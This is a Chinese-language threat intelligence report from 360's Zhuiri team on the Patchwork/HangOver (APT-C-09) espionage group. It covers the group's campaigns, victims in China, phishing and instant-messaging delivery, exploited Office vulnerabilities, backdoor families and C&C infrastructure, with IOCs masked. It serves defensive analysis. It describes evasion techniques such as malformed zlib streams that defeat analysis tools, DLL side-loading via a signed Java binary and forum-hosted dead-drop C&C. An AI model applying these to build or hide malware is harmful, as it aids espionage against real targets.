Loading
0

摩诃草APT组织大揭秘

披露申明

本报告中出现的IOC(Indicators of Compromise,威胁指标),进一步包括涉及到相关攻击事件的样本文件MD5等哈希值、域名、IP、URL、邮箱等威胁情报信息,由于其相关信息的敏感性和特殊性,所以在本报告中暂不对外披露,在报告中呈现的相关内容(文字、图片等)均通过打码隐藏处理。

*若您对本报告的内容感兴趣,需要了解报告相关细节或相关IOC,可与360追日团队通过电子邮件进行联系,另外我们目前只提供电子邮件联系方式:360zhuiri@360.cn,敬请谅解!

一、 概述

摩诃草组织(APT-C-09),又称HangOver、VICEROY TIGER、The Dropping Elephant、Patchwork,是一个来自于南亚地区的境外APT组织,该组织已持续活跃了7年。摩诃草组织最早由Norman安全公司于2013年曝光,随后又有其他安全厂商持续追踪并披露该组织的最新活动,但该组织并未由于相关攻击行动曝光而停止对相关目标的攻击,相反从2015年开始更加活跃。

摩诃草组织主要针对中国、巴基斯坦等亚洲地区国家进行网络间谍活动,其中以窃取敏感信息为主。相关攻击活动最早可以追溯到2009年11月,至今还非常活跃。在针对中国地区的攻击中,该组织主要针对政府机构、科研教育领域进行攻击,其中以科研教育领域为主。

从2009年至今,该组织针对不同国家和领域至少发动了3波攻击行动和1次疑似攻击行动。整个攻击过程使用了大量系统漏洞,其中至少包括一次0day漏洞攻击;该组织所采用的恶意代码非常繁杂。载荷投递的方式相对传统,主要是以鱼叉邮件进行恶意代码的传播,另外部分行动会采用少量水坑方式进行攻击;值得关注的是,在最近一次攻击行动中,出现了基于即时通讯工具和社交网络的恶意代码投递方式,进一步还会使用钓鱼网站进行社会工程学攻击。在攻击目标的选择上,该组织主要针对Windows系统进行攻击,同时我们也发现了存在针对Mac OS X系统的攻击,从2015年开始,甚至出现了针对Android OS移动设备的攻击。

由于对摩诃草组织的攻击行动不是第一次披露,通过针对相应TTPs(Tactics, Techniques and Procedures,战术、技术与步骤)的分析,结合以往跟进或披露的各类APT组织或攻击行动,我们认为大部分APT组织的相关攻击活动是不会停歇的,即使被某些报告暂时披露,导致过去的手段失效,但是只要被攻击目标存在价值,攻击组织的行动依然持续;存在部分情况,攻击已达到最初预期,攻击组织选择暂时的蛰伏,但最终的目的也都是为了下一次攻击养精蓄锐,这也是APT本身特性之一。其次,APT组织是否会对一个目标发动攻击,主要取决于被攻击目标的价值,而不在于被攻击目标本身的安全防护强弱程度,被攻击目标本身的强弱只是决定了攻击组织所需的成本,而大多数APT组织会为了达到其意图,几乎不计成本(具有国家背景的攻击组织所投入的攻击成本常常超出我们的想象)。

分析过去一年中发生的APT攻击,我们还发现中国一直都是APT攻击的主要受害国,其中相关攻击组织主要关注科研教育、政府机构领域,以窃取数据为目的。这和中国目前所处的经济与政治环境息息相关。同时,导致针对中国目标的攻击频频得手,除了被攻击目标本身防御措施薄弱以外,针对APT等高级威胁,被攻击目标本身缺乏积极主动的响应,即使在报告披露之后,甚至得知成为受害者之后,依然无法引起相应的重视,导致对自身检查和修复不足,常常旧伤未愈,又添新恨。

同时,中国网络安全行业依然缺乏能力型厂商的生存空间,大量的建设还是围绕过去的规划思路进行,这就导致了防护措施与高级威胁之间的脱节,从而给APT攻击造成了大量可乘之机。十三五规划的第一年,只有我们真正从安全规划上改变思路,积极引入能力型厂商,才能形成能力型安全厂商与客户之间的协同联动,打通监控发现到检测防御的事件响应各个环节,形成良性的闭合循环。

公开时间 报告名称 公司
2013年5月16 OPERATION HANGOVER-Unveiling an Indian Cyberattack Infrastructure Norman
2013年5月20 Operation Hangover: Q&A on Attacks Symantec
2013年5月21 Big Hangover F-Secure
2013年6月5 Operation Hangover: more links to the Oslo Freedom Forum incident ESET
2013年6月7 Rare Glimpse into a Real-Life Command-and-Control Server Crowdstrike
2013年11月5 Microsoft Office Zeroday used to attack Pakistani targets AlienVault
2013年11月5 CVE-2013-3906: a graphics vulnerability exploited through Word documents Microsoft
2013年11月6 Updates and Mitigation to Microsoft Office Zero-Day Threat (CVE-2013-3906) McAfee
2013年11月6 VICEROY TIGER Delivers New Zero-Day Exploit Crowdstrike
2013年11月7 THE DUAL USE EXPLOIT: CVE-2013-3906 USED IN BOTH TARGETED ATTACKS AND CRIMEWARE CAMPAIGNS[ FireEye
2014年6月10 Snake In The Grass: Python-based Malware Used For Targeted Attacks Blue Coat
2016年7月7 Unveiling Patchwork Cymmetria
201678 The Dropping Elephant – aggressive cyber-espionage in the Asian region Kaspersky
2016年7月10 白象的舞步——来自南亚次大陆的网络攻击 安天
2016年7月25 Patchwork cyberespionage group expands targets from governments to wide range of industries Symantec

二、 摩诃草组织的四次攻击行动

1.png

摩诃草组织相关重点事件时间轴

注:

1、 圆形蓝色里程碑:相关典型后门首次出现时间

2、 正方形里程碑:相关漏洞(CVE编号)首次出现时间

黑色:发起相关攻击时,漏洞为已知漏洞

橙色:发起相关攻击时,漏洞为0day漏洞

3、 菱形深灰色里程碑:载荷投递首次出现的时间

2.png

四波攻击行动

第一次攻击行动:Norman安全公司于2013年曝光的Hangover组织,我们发现相关样本最早可以追溯到2009年11月,该组织在2012年尤为活跃,相关恶意代码和攻击目标的数量有不断增加。该攻击主要针对巴基斯坦,也有针对中国的攻击,但相关攻击事件较少。除了针对windows操作系统的攻击,在2012年针对Mac OS X操作系统的攻击也出现了。在第一次攻击行动中就已经开始利用漏洞进行攻击,但暂时没有发现该组织会利用0day漏洞。

第二次攻击行动:摩诃草组织在2013年10月下旬开始针对巴基斯坦的一次集中攻击,主要针对巴基斯坦情报机构或军事相关目标。本次攻击行动具有代表性的就是攻击中采用了一次利用0day漏洞(CVE-2013-3906)的攻击,该漏洞是针对微软Office产品,随后微软发布的漏洞预警指出该漏洞主要和TIFF图像解析有关。

第三次攻击行动:第二次小范围集中攻击之后,2013年12月底至2014年初,开始了新一轮攻击,相关目标主要还是针对巴基斯坦军事领域相关目标,本次攻击行动中除了C&C服务器等从网络行为可以联系上第一次攻击行动以外,从恶意代码本身代码同源性已经很难关联到第一次攻击行动了。这主要是本次攻击行动中的恶意代码大部分是用Python编写的脚本,然后使用PyInstaller 和 Py2Exe两种方式进行打包。

第四次(疑似)攻击行动:本次攻击行动也安全厂商被称为“Patchwork”或“The Dropping Elephant”,从2015年初开始持续至今的攻击,其中从2015年8月开始至2016年6月攻击非常频繁。本次行动的攻击目标主要是中国地区,期间使用了大量文档型漏洞,以CVE-2014-4114使用最多。我们主要通过本次攻击行动中C&C的SOA关联到第一次攻击行动中相关C&C历史域名注册人,由于SOA本身可以被DNS管理者修改,所以存在被刻意修改的可能性,但从我们的分析推断来看这种可能性很低,另外结合相关行动意图和幕后组织的发起方,我们更倾向本次攻击行动属于摩诃草组织的最新一次攻击行动。在本报告后续章节的研究分析,会将本次攻击行动作为摩诃草组织的第四次攻击行动进行描述。

三、 中国受影响情况

本章主要基于摩诃草组织近期的第四次攻击行动,另外会涉及少量第三次攻击行动。进一步对相关攻击行动所针对目标涉及的地域和行业进行相关统计分析,时间范围选择2015年7月1日至2016年6月30日。

1. 地域分布

3.jpg

国内用户受影响情况(2015年7月-2016年6月)

国内受影响量排名前三的省市是:北京、广东、福建,其中北京地区是主要攻击目标,在西藏、宁夏和贵州这三个省市自治区暂未发现受影响的用户。

注:本报告中用户数量主要指追日团队监控到的计算机终端的数量

2. 行业分布

4.jpg

主要针对的行业分布

与第一次攻击行动类似,第四次攻击行动在针对中国的攻击中,科研教育领域依然是摩诃草组织重点针对的目标。

从第一次攻击行动开始军事领域一直是摩诃草组织关注的重点,期间主要是针对巴基斯坦地区,很少针对中国地区,但从2015年第三方和第四次攻击行动的开始,这一趋势逐渐改变,针对中国地区的军事领域的相关攻击不断增加。

四、 载荷投递

关于针对中国的APT攻击中常使用的载荷投递方式,和主流的载荷投递方式的介绍,我们在《2015年中国高级持续性威胁(APT)研究报告》 第四章中也详细介绍,读者可以结合参看相关报告。

1. 鱼叉邮件

5.jpg

鱼叉邮件主要的类型

注:上图中斜体字内容是摩诃草组织较少或从未使用的方式。

携带恶意附件

摩诃草组织最常用的是携带二进制格式的可执行恶意程序,相关恶意可执行程序多为“.exe”和“.scr”扩展名。恶意代码文件图标一般为伪装文档、图片图片,进一步一般这类可执行程序均进行压缩,以压缩包形态发送。压缩包和包内恶意代码文件名一般是针对目标进行精心构造的文件名,相关文件名一般与邮件主题、正文内容和恶意代码释放出的诱饵文档内容相符。

另外还频繁使用文档型漏洞,文档型漏洞文件主要作为邮件附件进行针对性投放。相关文档漏洞主要是针对微软Office系列,主要采用已知漏洞进行攻击,另外也使用过0day漏洞。关于摩诃草组织所使用的漏洞我们在之后章节会有详细介绍。

恶意网址

一般APT攻击中鱼叉邮件使用恶意网址(或恶意URL)相比携带恶意附件还是少很多。但是在摩诃草组织的第四次攻击行动中则为主流的方法。

通常恶意网址会出现在邮件正文中(以超链接或非超链接形态出现),或邮件附件内容中。后面这种情况较少,一般都是在正文中出现。恶意网址最终指向的页面一般分为几种

:钓鱼页面、漏洞页面(浏览器漏洞、文档漏洞)和二进制可执行程序。钓鱼页面指的是不包含最终指向二进制可执行程序的恶意代码(基本为脚本),一般是通过伪造的页面信息,诱导目标将相关敏感信息(用户名、密码等)通过页面窃取。

在摩诃草组织发动的攻击行动中主要是恶意网址以超链接形态存在与邮件正文中,最终是指向一个文档型漏洞文件,相关文档型漏洞文件被放置在钓鱼网站(攻击者依照目标所关注的网站,进行伪造的恶意网站)。攻击者采用这种载荷投递的方式,可以有效地绕过以检测邮件附件为主的防御体系。

2. 即时通讯工具

在APT攻击中利用即时通讯工具进行载荷投递的情况比较少,主要是由于基于即时通讯工具的攻击成本远大于使用邮件。关于使用邮件和即时通讯工具,我们进行了一个对比,具体如下表所示:

6.jpg

邮件和即时通讯工具相关对比

首先邮件一般是以办公为主,而即时通讯工具(如:QQ,之后涉及到相关都以QQ为例)除了企业级产品,其他以个人用户为主的产品通常都是以个人用途为主。

从上表中“获得目标联系方式难度”这项来看,电子邮箱地址,尤其是对外办公联系的地址一般都会公布在互联网上,而QQ号码,尤其是以个人名义的QQ号码很少会公布。进一步攻击者已经获得目标QQ号,在“投放实施难度”,需要攻击者具备这些条件:首先,在侦查跟踪环节已经对目标积累了一定的了解,包括目标基本信息、关注的领域、兴趣爱好等;之后,就是需要与目标建立起联系,一般是攻击者主动添加目标QQ号,或者是被动等待目标添加,无论是主动还是被动方式建立联系,都需要大量社会工程学与目标之间进行交互。虽然成本较高,但一旦与目标之间建立起联系,并且取得目标的信任,则之后攻击的成功率会较高,而且时效性高。

基于部分客户反馈提供的相关攻击信息,我们发现摩诃草组织在第四次攻击行动中,从2015年8月底持续到2016年6月,大量使用即时通讯工具(主要是腾讯的QQ聊天工具)向目标发送木马文件和文档型漏洞文件。其中主要以发送二进制可执行程序为主,这类程序主要伪造成MP4格式的视频文件,下表示相关恶意文件的文件名:

部分诱饵文件名称(伪装MP4视频文件)

我们发现同一个恶意诱饵文件还会针对不同的目标进行多次投放,进一步我们也观测到同一目标在短期内也会被不同的木马连续攻击,如下图所示,所使用的木马类型都属于同类不同的变种,我们推测出现这种情况是由于攻击者对目标失去控制权限后,进一步重新获得权限,这也能看出目标的重要程度。

8.jpg

针对同一目标的三次攻击(基于即时通讯工具)

3. 社交网络

本月初我们披露了一起名为人面狮(APT-C-15) 的攻击行动,此次行动是活跃在中东地区的网络间谍活动。期间我们介绍了利用社交网络(Facebook)进行水坑攻击的事例。利用社交网络进行载荷投递的攻击方式并不常见,在摩诃草组织的攻击行动中也采用了类似方式。从2015年3月开始我们就陆续观察到利用社交网络(国内某社交网站)进行载荷投递,但其频次是远低于利用鱼叉邮件和即时通讯工具。下图是攻击者所关注的两个目标页面。

9.jpg

目标社交网络帐号页面1

10.jpg

目标社交网络帐号页面2

利用社交网络进行载荷投递一般是分为:SNS蠕虫、放置二进制格式可执行恶意程序或文档型漏洞文件,利用SNS蠕虫比较少见,主要是需要依赖第三方社交网络平台自身漏洞,这对攻击成本有较高要求。最常见的就是放置二进制可执行程序或文档型漏洞文件,一般是放置文件或恶意链接地址,具体投递可能会直接给目标用户留言、发信息等,或者放置到目标所关注的其他社交账号的页面上,后者就是人面狮基于Facebook进行水坑攻击的方式。

4. 水坑攻击

APT攻击中主流的水坑攻击主要分为以下两种:

第一种:被攻击目标关注A网站,攻击者将A网站攻陷,并植入恶意代码(一般为漏洞脚本文件,俗称挂马),当目标访问被攻陷的A网站并浏览相关页面时,当目标环境相关应用触发漏洞则有可能被植入恶意代码。

第二种:被攻击目标关注A网站,攻击者将A网站攻陷,并将A网站上一些可信应用或链接替换为攻击者所持有的恶意下载链接,当目标访问被攻陷的A网站并将恶意下载链接的文件下载并执行,则被植入恶意代码。这种攻击的典型案例是2014年公开Havex木马 ,也被称作蜻蜓(Dragonfly)和活力熊(Energetic Bear)和我们在2015年5月末发布的海莲花(OceanLotus)APT组织 。

这两种水坑攻击的共性是攻击者需要获得被攻击目标所关注网站的修改权限。在摩诃草组织的相关攻击行动中,几乎很少采用以上者两种“标准”的水坑攻击。期间类似水坑攻击,如鱼叉邮件正文中嵌入恶意网址(钓鱼网站)或基于社交网络的攻击。

另外在Norman安全公司于2013年曝光的Hangover报告中,披露的利用Internet Explorer漏洞(CVE-2012-4792)和Java漏洞(CVE-2012-0422),这两个漏洞主要出现在水坑攻击中。

五、 钓鱼网站

1. 攻击描述

摩诃草组织除了对目标用户进行基于二进制可执行程序的攻击以外,还会对目标用户进行传统的钓鱼网站攻击。

钓鱼网站一般伪装成网易邮箱网站,诱骗用户在钓鱼页面输入用户名和密码,来达到窃取目标用户账号信息的目的。这种方法没有利用一般的二进制木马或漏洞程序,而是完全通过社会工程学的方法进行攻击。

相关钓鱼网站还是通过载荷投递中的鱼叉邮件(恶意网址)、即时通讯工具、社交网络等方法进行定向传播。

11.jpg

相关钓鱼网站列表

攻击者对网易邮箱网站页面进行了完全的拷贝复制,以此来达到以假乱真,最终只是在登录验证的环节进行了替换,将原有地址替换为指向攻击者所持有的这个IP:**.***.**.242。

12.jpg

钓鱼网站回传目标用户账号信息源码

2. 典型案例

案例1:*******web.com

13.jpg

钓鱼页面1

14.jpg

钓鱼页面1(源码)

案例2:*******ina.info

15.jpg

钓鱼页面2

16.jpg

钓鱼页面2(源码)

六、 漏洞利用

1. 0day漏洞(CVE-2013-3906)

背景

在第二次攻击行动中,针对巴基斯坦的攻击摩诃草组织使用了该漏洞,该漏洞在当时还是0day漏洞,从捕获的攻击事件来看最早使用该漏洞是在2013年10月23日,直到11月5日才有相关安全机构发布研究报告,微软给出安全公告。这也直接证明了该组织是具备持有0day漏洞的能力。该漏洞在其他APT组织中也使用广泛,如APT-C-05、APT-C-06、APT-C-17 等组织都使用过该漏洞,但使用时已经不是0day了。

17.jpg

漏洞相关基本信息

分析

CVE-2013-3906是ogl.dll模块中在处理TIFF文件时存在一个整数溢出漏洞,精心构造数据会导致代码分配一块大小为0的内存,却像其中写入0×1484大小的数据,最终导致覆盖堆中对象虚表,结合ActiveX控件进行堆喷射攻击,完成最终利用。

18.jpg

往大小为0的堆拷贝数据


调用栈

20.jpg

拷贝源数据

21.jpg

拷贝源数据对于样本中的内容

22.jpg

拷贝目的地堆内存大小为0

23.jpg

拷贝源数据堆内存大小0×1484

2. 已知漏洞

摩诃草组织发动的每次攻击行动中都会频繁的使用漏洞进行攻击,其中大多数情况还是使用已知漏洞(或称1day或Nday漏洞),也就是受影响厂商已经知道相关漏洞并发布更新补丁或者新版本产品代替。

在相关攻击行动中,该组织更倾向使用文档型漏洞,这往往需要和载荷投递方式进行配合。另外也会涉及到浏览器等适合水坑攻击的漏洞,我们在“第四章载荷投递”中就曾提及Internet Explorer漏洞(CVE-2012-4792)和Java漏洞(CVE-2012-0422)这两个漏洞的利用。

以文档型漏洞为主

下表是相关文档型漏洞列表,主要针对Microsoft Word和PowerPoint。其中以CVE-2014-4114在第四次攻击行动中使用最为频繁。

相关漏洞列表

CVE-2014-4114

背景

CVE-2014-4114漏洞是iSIGHT公司 在2014年10月14日发布相关报告,报告其中提到一个0day漏洞(CVE-2014-4114)用于俄罗斯相关主要针对北约、欧盟、电信和能源相关领域的网络间谍活动。微软也是在10月14日发布相关安全公告。

而CVE-2014-6352是可以认为绕过CVE-2014-4114补丁的漏洞,微软之前的修补方案首先在生成Inf和exe文件后添加MakeFileUnsafe调用,来设置文件Zone信息,这样随后在漏洞执行inf安装时,会有一个安全提示。而CVE-2014-6352漏洞样本抛弃了使用inf来安装exe,转而直接执行exe。因为xp以上系统可执行文件的右键菜单第二项是以管理员权限执行,这样导致如果用户关闭了uac会导致没有任何安全提醒。所以微软6352的补丁是在调用右键菜单添加一个安全提示弹窗。

漏洞编号 CVE-2014-4114
说明 Windows OLE 中存在一个漏洞,如果用户打开包含特制 OLE 对象的文件,则该漏洞可能允许远程执行代码。成功利用此漏洞的攻击者可以获得与登录用户相同的用户权限。如果当前用户使用管理用户权限登录,则攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。那些帐户被配置为拥有较少用户权限的用户比具有管理用户权限的用户受到的影响要小。
公布时间 2014年10月14日
参考链接 https://technet.microsoft.com/zh-cn/library/security/ms14-060.aspx
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4114
漏洞编号 CVE-2014-6352
说明 在用户下载或接收,然后打开经特殊设计的包含 OLE 对象的 Microsoft Office 文件时,会导致当前用户上下文中的远程执行代码漏洞。Microsoft 最初通过协调漏洞披露渠道了解到有关此漏洞的信息。此漏洞最初在 Microsoft 安全通报 3010060 中进行了说明。Microsoft 获悉尝试使用此漏洞的有限攻击。此更新通过修改在访问 OLE 对象时受影响的操作系统验证内存使用的方式来解决这些漏洞。
公布时间 2014年10月21日
参考链接 https://technet.microsoft.com/zh-cn/library/security/3010060.aspx
https://technet.microsoft.com/zh-cn/library/security/ms14-064.aspx
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6352

分析

由于之前CVE-2014-4114和CVE-2014-6352主要内嵌在Microsoft Office 2007(open xml)格式文档中使用。

Open Xml通过xml描述文档构造,通过zip打包在一起,导致安全分析人员很容易提取出样本中的恶意数据。本次样本(**************************df4715)使用了传统的office03(复合文档格式)文件格式,并且通过构造特殊zlib数据来躲避多数安全软件扫描和分析人员分析。

传统的CVE-2014-4114样本分析只需要使用zip解压Microsoft Office 2007文档后,查看\ppt\embeddings\目录下内嵌文件即可知道样本行为。

25.jpg

Microsoft Office 2007样本内嵌恶意文件

而Microsoft Office 2003格式无法直接解压缩,并且原来embeddings目录下的文件会被zlib压缩后以ExternalObjectStorage 结构保存在PowerPoint Document流中。

通常我们解析到ExOleObjStgCompressedAtom结构,调用zlib解压其中数据即可得到原始的内嵌文件,而此样本利用Office容错能力嵌入了没有zlib头的zlib流导致大部分分析工具解压识别,如我们使用oletools解析提示无效压缩头。

26.jpg

Oletools解压pps内嵌zlib数据失败

1.png

恶意样本内嵌的zlib流

修正解压问题后,最终拿到了内嵌文件,利用inf给内嵌的pe写启动达到最终目的。

2.png

恶意样本内嵌的Inf文件

3.png

恶意样本内嵌的PE文件

3. 诱饵文件

诱饵文件主要分为文档、图片和视频,其中主要是文档类,进一步相关内容主要涉及到政治、军事等,另外还有一些色情相关内容。

视频类

4.png

视频类恶意文件图标

伪装视频类文件的攻击主要出现在基于即时通讯工具的这种载荷投递的方式中。其他方式中很少见。

图片类

5.png

诱饵图片

文档类

Word相关

6.png

诱饵文档1(CVE-2015-1641)

7.png

诱饵文档2(CVE-2012-0158)

8.png

诱饵文档3(CVE-2014-1761)

PowerPoint相关

诱饵文档4(CVE-2014-4114)

PDF类

10.png

诱饵文档6(PDF)

七、 后门分析

摩诃草组织第一次攻击行动中,针对Windows系统安装植入环节的恶意代码主要分为两大类:Smackdown下载者和HangOver(或HangOve)后门。Smackdown下载者主要在第一阶段实施,可能是由一个自称“Yash”或“Yashu”的人开发编写,HangOver后门主要应用在第二阶段,主要作用是窃取敏感信息,其中以窃取指定文件扩展名的文件为主。

11.png

相关文件扩展名1(windows)

另外,在第一次攻击行动中,就已经发现存在针对Mac OS X系统的攻击了,家族名称为OSX.Kumar,其主要功能还是窃取敏感数据信息,和HangOver后门目的类似。

从第三次攻击行动开始到第四次攻击行动,相关恶意代码发生了较大的变化,其中出现了由Python、AutoIt、Go语言等开发的恶意代码,在本章节我们会有详细的介绍。

摩诃草组织主要针对PC(Windows、Mac OS X)进行攻击,我们在2015年发现该组织开始针对移动设备(Android系统)进行攻击,由于相关样本信息的特殊性,本报告中暂不对Android版本的恶意代码展开分析介绍。

1. Mac OS X

功能简介

Trojan.Spy.OSX.Kumar.A

添加自身为开机自启动,恶意代码在FileBackup.ini中保存了一些变量信息,例如文件后缀名列表,搜索磁盘下为下列后缀名的文档,压缩成zip文档后基于HTTP协议上传。

12.png

相关文件扩展名2(Mac OS X)

该家族中各个样本程序代码大致,不同点在于上传的URL不同,如下表所示:

13.png

相关URL列表

Trojan.Spy.OSX.Kumar.B

首先将自己复制到“/Users/%username%/%bundlename%.app”目录下,执行“/bin/sh -c open -a /Users/%username%/%bundlename%.app”,通过修改“/Users/%username%/Library/Preferences/com.apple.loginitems.plist”实现开机自启动。每20s获取屏幕截图保存在“$HOME/MacApp”中,命名规则为yy-MM-dd-HH:mm:ss.png,通过HTTP上传到远程服务器。

14.png

样本证书时间戳和其他样本信息

OSX.Kumar变种之间的关联

OSX.Kumar.A和OSX.Kumar.B的作者签名信息相同:“Developer ID Application:Rajinder Kumar”,两者部分代码相同,如下图所示:

15.png

代码对比图

16.png

两个版本恶意代码共用C&C

从上表也可以看出两者之间存在共用C&C服务器的情况,据上述分析我们认为相关恶意代码应该为同一作者所开发,只是两者在功能上不同,OSX.Kumar.A是上传文件,OSX.Kumar.B获取屏幕信息。

2. Python版本

概述

17.png

功能流程图

样本文件大多伪装成“pps、doc、pub、pdf、jpg”等类型的文件诱导用户点击,样本程序大多是自解压文件点击后在打开正常文件的同时可以释放并运行恶意程序。恶意的文件主要用python编写的脚本然后使用PyInstaller 和 Py2Exe两种方式进行打包。

18.png

自解压样本1

功能介绍

Python相关的exe文件主要通过PyInstaller和 Py2Exe两种打包方式将python脚本打包成exe程序的,每一个打包成的exe都是一个功能模块,主要功能有三类,此外还有一个非python的程序。

模块A(CxsSvce.exe,send.exe)

调用系统工具systeminfo.exe检测虚拟机,上传指定目录下的文件到服务器,从服务器下载文件并执行

19.png

相关代码截图1(模块A)

模块B(reg.exe,reg1.exe)

这个模块并不是python的而是用MINGW32 C++编写的,主要功能就是修改注册表添加启动项。

20.png

相关代码截图2(模块B)

模块C(winrm.exe,stisvc.exe)

主要功能就是偷窃文件,格式主要有:“doc, xls, ppt, pps, inp, pdf, xlsx, docx, pptx”

21.png

相关代码截图3(模块C)

模块D(sppsvc.exe,key.exe)

这是一个以键盘记录器,hook了键盘和鼠标时间,记录键盘操作到日志文件中。

22.png

相关代码截图4(模块D)

3. 2016 AutoIT(Indetectables RAT)

执行流程

23.png

2016 AutoIT执行流程

基于第三方已公开方法

24.png

基于第三方已公开工具、源码等

25.png

相关第三方已公开工具、源码参考链接

25.png

相关第三方已公开工具、源码参考链接

具体功能分析

恶意代码使用AutoIt脚本编译成的exe来执行功能,其中核心代码抄袭自一款叫Indetectables RAT的远程控制软件。

主要的库函数全部来自引用,程序使用了现成的AutoIt库函数来直接组织程序功能。

26.png

库函数引用表

程序主要过程中的功能通过使用上述库函数实现,其中部分函数抄袭自Indetectables RAT

27.png

功能函数表

28.png

C&C功能说明

4. Go语言

样本使用GO语言编写,功能为从C&C下载SHELLCODE,解密后为PE,在内存中加载并执行。C&C地址为***.***.***.172,端口为8443。

每次下载的内容不相同,但是解密后的PE相同,解密时的大小有错误,需要patch后才能继续执行。但是进入OEP依然有错误,代码为0且不可执行。

5. FakeJLI

基本信息

FakeJLI是第四次攻击行动中近期很活跃的一个家族,通过样本时间戳来看在2016年6月已经出现。

当初始样本被点击打开以后,首先会释放各种组件到%temp%目录,然后触发CVE-2014-4114漏洞,将释放在%temp%目录的组件之一的sysvolinfo.exe文件运行起来,sysvolinfo.exe该文件名曾多次在AutoIt样本中出现。

通过分析sysvolinfo.exe是用IExpress打包成的自解压安装程序(类似于NSIS),通过解包在%temp%目录下释放MICROS~1.EXE,jij.dll及Msvcr71.dll三个文件。其中Msvcrt71.dll为正常文件,为VC7.0运行库,之后执行MICROS~1.EXE,安装包的标题信息为merged1234。

29.png

相关基本信息

行为隐藏和安全检测绕过

MICROS~1.EXE签名信息

MICROS~1.EXE是Java的一个组件,带有正常的签名信息。Jil.dll 是真正的恶意程序,Micros~1.EXE默认会加载这两个动态库。MICROS~.EXE在main函数中会直接调用jil.dll的导出函数JLI_MemAlloc(),而没有经过任何的校验,从而导致恶意代码被执行起来。Msvcrt71.dll为正常文件,为VC7.0运行库,释放它的目的是为了使样本能正常运行。

31.png

jij.dll中所有的导出函数都被重定向到了恶意代码开始的地方

MICROS~1.EXE 是正常的带签名Java组件,原本其调用的Jli.dll原本也应该是正常的Java组件,现在被替换成带毒的Dll(导出函数名不变,但是函数是病毒函数),即通过带签名的可信程序去加载伪装成正常组件的病毒Dll,也算是一种Dll劫持。利用这种方法可以绕过杀软的主动防策略,从而可以执行真正恶意代码,是一种比较常见的绕过现有病毒查杀体系的方法。

具体功能分析

功能简述

隐藏掉自身的窗口以防止被察觉到。

设置自身为自启动。

载入其他模块,并动态加载,或者创建子进程。

当有U盘插入的时候遍历目录,搜索各种文档(主要包括:“pdf、doc、docx、ppt、pptx、txt”),并写入文件,上传到远程服务器。

连接跳板链接获取真正C&C地址。

与远程C&C服务器通信接收执行命令,收集各种信息,包括:用户名、电脑名用户、样本版本信息等上传。

反弹Shell,执行命令。

C&C地址的获取

恶意代码在获取C&C地址的时候,方法比较特殊,相关C&C地址并未预留在恶意代码本身,而是存放在第三方可信网站中。

进一步主要是两种方式:

基于第三方论坛博客:攻击者会选择在论坛回复发帖留言,将C&C地址预留在帖子内容中,进一步通过不断修改已发帖的内容来达到更改C&C信息的目的。

入侵可信网站:攻击者事先会将正常可信网站攻陷后,将相关C&C地址预留在指定页面。

32.png

回复帖中预留的相关C&C地址信息

解密后相关真实C&C地址如下:

hxxp://***.***.***.173/yumhong/ghsnls.php

另外关于本小节的内容,在本报告的“C&C分析”章节会有进一步详细描述,具体请参看相关章节内容。

八、 C&C分析

1. Whois隐私保护

Whois隐私保护是指域名注册服务商为域名注册者提供的一种服务,即域名WHOIS信息会隐藏域名注册者的真实信息,如电子邮件地址、电话号码等,一般这种服务为收费有偿服务。

在APT攻击中,相关组织非常喜欢采用whois隐私保护这种方式来隐藏自己的真实身份,安全研究机构或人员很难找到相关线索信息进行关联回溯。下图是我们就第一次攻击行动和第四次攻击行动中是否采用whois隐私保护进行的统计分析。

33.png

左图(第一次攻击)、右图(第四次攻击)

上图分别是两次攻击行动中C&C域名的保护情况(目前的状态,如果相关域名现在被sinkhole状态,则以历史存在whois隐私保护来计算),整体来看第四次攻击行动基本都采用了whois隐私保护,大部分从域名注册后的第二天就开始进行whois隐私保护。而第一次攻击行动中,尤其是2011年初期注册的域名,很多是未进行whois隐私保护,如下表所示,在2011年未进行保护,在2012年就开始进行whois隐私保护来进行弥补。

34.png

第一次攻击行动相关C&C信息(WHOIS信息)

2. 域名注册时间分布

35.png

左图(第一次攻击)、右图(第四次攻击)

上图分别是两次攻击行动中C&C域名注册时间的分布情况,第一次攻击行动主要分布在2011和2012年,相关攻击活跃的时间主要是2012年,而在第四次攻击中主要是2014和2015年,其相关攻击主要活跃的时间是2015年和2016年。

由此也可以推断在最新第四次攻击中,摩诃草组织有计划的提前半年到一年左右就将相关域名资源规划好了。

3. C&C对应IP地理位置分布

36.png

(第一次攻击)、右图(第四次攻击)

可以看出第一次攻击行动和第四次攻击行动所使用的IP地理位置还是有很多共性的。排除第一次行动中的英国和第四次攻击中的德国,其使用比例比较接近。

4. 基于第三方可信网站中转

概述

在“后门分析”章节中我们对FakeJLI家族进行了分析,并发现了其他特殊的获取C&C地址的方式。

进一步主要是两种方式:

基于第三方论坛博客:攻击者会选择在论坛回复发帖留言,将C&C地址预留在帖子内容中,进一步通过不断修改已发帖的内容来达到更改C&C信息的目的。

入侵可信网站:攻击者事先会将正常可信网站攻陷后,将相关C&C地址预留在指定页面。

37.png

相关被利用第三方可信网站链接

恶意代码首先会从论坛帖子中寻找相关C&C地址,如果没有则会尝试从被入侵网站中寻找相关C&C地址。被作为中转的论坛都是国内大型论坛,攻击者通过回复正常提问帖子来隐藏C& C信息。

相关案例

某大型论坛1

38.png

某大型论坛1相关用户信息

1.jpg

相关回帖信息

如上图所示,该域名信息在3月20日发布,最近的一次修改是4月6号,可知作者通过修改帖子来不断更新C&C信息。

某大型论坛2

1.png

某大型论坛2相关用户信息

2.png

相关回帖信息

C&C信息同样是3月19发布,4月6号修改。另外攻击者在论坛中提及发邮件给了*********ch@163.com,不知道是否对相关邮箱进行了攻击。

某大型论坛3

3.png

某大型论坛3相关用户信息

4.png

相关回帖信息

用户注册日期是3月14日,最近回复也是3月14日。

九、 关联分析

本章主要就摩诃草组织的四次攻击行动之间的联系进行关联分析,进一步主要从相关攻击中所使用的恶意代码、C&C服务器等技术层面的分析。

从这四次行动的攻击意图和背景分析来看,应该都是来自于同一国家,且攻击目标基本一致。

1. 第一次攻击行动中Windows和Mac OS X

共用C&C

5.png

OSX.Kumar.A基本信息

6.png

OSX.Kumar.A样本代码截图(C&C地址)

7.png

Hangover样本基本信息

8.png

Hangover样本代码截图(C&C地址)

特殊字符串

对比OSX.Kumar.A样本和已知Hangover样本的分析结果,可以看出*********zone.net是共用C&C。进一步OSX.Kumar.A请求的URL如下:

*********one.net/yash/upload.php

